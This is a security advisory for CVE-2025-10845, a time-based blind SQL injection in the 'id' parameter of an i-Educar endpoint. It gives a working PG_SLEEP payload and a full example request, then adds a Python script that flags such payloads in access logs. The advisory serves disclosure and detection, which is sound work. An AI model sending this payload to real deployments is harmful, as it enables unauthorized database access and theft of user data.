CVE-2025-10845

SQL Injection

CVE-2025-10845: SQL Injection (Blind Time-Based) Vulnerability in id Parameter on module/ComponenteCurricular/view Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10845

Summary

A SQL Injection vulnerability was discovered in the id parameter of the module/ComponenteCurricular/view endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.

Details

The application fails to properly sanitize user-supplied input in the id parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.

PoC

Vulnerable Endpoint: module/ComponenteCurricular/view

Parameter: id

Payload:

' AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND 'QDaZ'='QDaZ

Example Request

GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1
Host: localhost:8086
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE
Connection: keep-alive

This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.

Normal request:

SQLi Request:

Observe the time delay in the server response, indicating the successful execution of the SQL payload.
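
The same signal can be hunted in web server logs. The Python below is an added example, not part of the original advisory or of the i-Educar code base: it flags requests to this endpoint whose id is not a plain integer and marks those where the response took at least as long as the requested sleep. It assumes an nginx-style access log with the request time in seconds as the last field and that legitimate id values are integers; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not real traffic). Assumed format: combined access
# log with the request time in seconds appended as the last field.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Oct/2025:10:00:01 +0000] "GET /module/ComponenteCurricular/view?id=8 HTTP/1.1" 200 5120 0.084
203.0.113.9 - - [01/Oct/2025:10:00:09 +0000] "GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1" 200 5120 5.102
203.0.113.7 - - [01/Oct/2025:10:00:20 +0000] "GET /module/ComponenteCurricular/view?id=12 HTTP/1.1" 200 5120 6.310
203.0.113.8 - - [01/Oct/2025:10:00:25 +0000] "GET /module/ComponenteCurricular/view?id=abc HTTP/1.1" 200 812 0.031
203.0.113.8 - - [01/Oct/2025:10:00:26 +0000] "GET /module/Other/view?id=abc HTTP/1.1" 404 312 0.020
"""

ENDPOINT = "/module/ComponenteCurricular/view"
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3} \d+ ([\d.]+)$')
SLEEP_RE = re.compile(r"pg_sleep\s*\(\s*(\d+(?:\.\d+)?)", re.IGNORECASE)


def classify(line):
    """Return a finding dict for a suspicious request to the endpoint, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, seconds = m.group(1), m.group(2), float(m.group(3))
    url = urlsplit(target)
    if url.path != ENDPOINT:
        return None
    # parse_qs percent-decodes, so encoded quotes and spaces become visible.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: a legitimate id is a plain integer
        finding = {"ip": ip, "id": value, "seconds": seconds,
                   "reason": "non-integer id", "delay_observed": False}
        sleep = SLEEP_RE.search(value)
        if sleep:
            finding["reason"] = "time-delay function in id"
            # A response at least as slow as the requested sleep suggests the
            # injected SQL actually ran, i.e. the host was vulnerable.
            finding["delay_observed"] = seconds >= float(sleep.group(1))
        return finding
    return None


def scan(log_text):
    """Classify every line of an access log and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The slow request with id=12 is not reported: latency alone is not evidence, only latency that matches a sleep value found in the parameter.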

Impact

  • Unauthorized access to sensitive data (e.g., users, passwords, logs).
  • Database enumeration (schemas, tables, users, versions).
  • Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).
  • Full compromise of the application if chained with other vulnerabilities.
  • This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.

Reference

https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md

Finder

Karina Gante

By: CVE-Hunters
